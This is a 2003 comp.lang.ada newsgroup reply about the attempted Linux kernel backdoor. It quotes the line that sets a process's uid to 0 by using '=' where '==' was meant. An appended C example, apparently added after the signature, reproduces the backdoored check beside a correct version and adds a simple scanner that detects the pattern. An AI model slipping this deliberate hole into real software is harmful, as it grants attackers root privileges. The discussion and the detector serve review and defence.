From: "Warren W. Gay VE3WWG"
Newsgroups: comp.lang.ada
Subject: Re: C's trikery semantic opens up backdoor in new Linux kernel
References: <3FB1A63C.9080200@nowhere.com> <8Eisb.14119$hB5.9208@nwrdny02.gnilink.net>
Date: Wed, 12 Nov 2003 13:03:39 -0500
Organization: Bell Sympatico

Vinzent 'Gadget' Hoefler wrote:
> J Cusick wrote:
>>On Wed, 12 Nov 2003 04:26:44 +0000, Stephane Richard wrote:
>>>For some reason, I can't open that link you posted here..
>>
>>The Register site seems to be down at the moment... The link is good.
>>
>>The article discusses the fact that someone tried to slide in a C line
>>(actually 2 lines) that trashed the tcp stack allowing a negative offset
>
> No. It is worse than that.
>
> The interesting line in question is this one:
>
> |if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
>
> First this looks like a sanity check. But look closer. This single
> line serves one single purpose: to give you root-privileges when you
> just pass the right flags. Note the "current->uid = 0" instead of
> "current->uid == 0". Who the hell had the ******* bad idea that
> assignments could return values?

It was a matter of time before this happened. But to be fair to C, this is a problem with any large body of code. How carefully is every source line submission scrutinized? As the quantity of code increases, the likelihood of some other subtle change like this being introduced increases.

Linux as Open Source enjoys the advantage of many eyes, which helps. But it also enjoys the slight disadvantage of "many submissions" as well ;-)

I do accept that Ada95 would make this more difficult to do, but this seems to be all academic talk for the moment ;-)

--
Warren W. Gay VE3WWG
http://home.cogeco.ca/~ve3wwg
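The `=` versus `==` point in the quoted line, as an added C example that is not part of this thread or of the kernel: the task struct, the wait-flag values and the one-line review scanner are constructed stand-ins of my own, chosen only to make the side effect and its detection visible.

```c
#include <string.h>
/* Constructed stand-ins for the task struct and wait flags; not kernel code. */
#define __WCLONE 0x80000000u
#define __WALL   0x40000000u
struct task { unsigned int uid; };

/* The line quoted in the thread, `=` where `==` was meant. An assignment
 * expression has the value assigned (here 0), so the condition is always
 * false and the body never runs, but uid has already been overwritten.
 * The extra parentheses also suppress gcc/clang's -Wparentheses warning. */
int backdoored_check(struct task *cur, unsigned int options)
{
    if ((options == (__WCLONE|__WALL)) && (cur->uid = 0))
        return 1;                      /* never reached */
    return 0;
}

/* What the line appeared to do: a comparison with no side effect. */
int intended_check(struct task *cur, unsigned int options)
{
    if ((options == (__WCLONE|__WALL)) && (cur->uid == 0))
        return 1;
    return 0;
}

/* Run one variant against a task with the given uid; return uid afterwards. */
unsigned int uid_after_check(int backdoored, unsigned int uid, unsigned int options)
{
    struct task t = { uid };
    if (backdoored) backdoored_check(&t, options); else intended_check(&t, options);
    return t.uid;
}

/* Review aid: report a lone `=` (not ==, !=, <=, >=) anywhere inside the
 * parenthesised condition of an `if` on one source line. */
int assignment_in_if_condition(const char *line)
{
    const char *p = strstr(line, "if");
    int depth = 0;
    if (!p || !(p = strchr(p, '('))) return 0;
    for (; *p; p++) {
        if (*p == '(') depth++;
        else if (*p == ')' && --depth == 0) break;
        else if (*p == '=') {
            if (p[1] == '=') { p++; continue; }                    /* == */
            if (p[-1] == '!' || p[-1] == '<' || p[-1] == '>') continue;
            return 1;
        }
    }
    return 0;
}
```

The scanner is deliberately crude (it ignores strings, comments and multi-line conditions); the point it makes is that a mechanical pass over submitted lines catches this shape even when the compiler stays silent.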